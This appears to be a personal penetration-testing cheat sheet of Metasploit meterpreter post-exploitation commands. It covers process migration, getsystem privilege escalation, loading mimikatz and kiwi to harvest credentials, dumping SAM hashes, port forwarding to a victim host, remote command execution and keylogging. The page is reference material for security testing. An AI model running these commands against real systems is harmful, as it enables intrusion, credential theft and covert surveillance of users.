akde/infosec

Information security is ultimately about managing risk


Upgrade a shell to a meterpreter shell

sessions -u $session_id

Caution: the build tuple may be the wrong architecture.

Show processes

ps

Show how long the user has been away from the computer (try things that could pop up shells, preferably after the system has been idle for some time).

idletime

Migrate into another process to make the connection independent of the original (reverse shell) process. (If this doesn't work, maybe the meterpreter shell is not suitable. Try to create a "real" meterpreter shell.)

run migrate -p $pid
migrate $pid

Try to get system

getsystem

Try to get credentials, load mimikatz / kiwi

load mimikatz
load kiwi
load incognito

Create port forwarding of port 139 of the victim to 1390 local.

meterpreter > portfwd add -l 1390 -p 139 -r 10.11.1.50

Note: See also the route command in the Copy, routing,.. article.

  • shell — the most useful: creates a full shell
  • getsystem — tries to get a root shell
  • sysinfo — shows general info
  • getuid — shows the system's name
  • run post/windows/gather/hashdump — dumps the SAM database
  • search -f *file*.txt — searches the whole file system for a file
  • upload <local_file> <remote_file>
  • download <remote_file> <local_file>
  • execute -f cmd.exe -i -H — executes a command on the target
  • help for anything else
  • Keyboard logging:
    • keyscan_start
    • keyscan_dump

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.
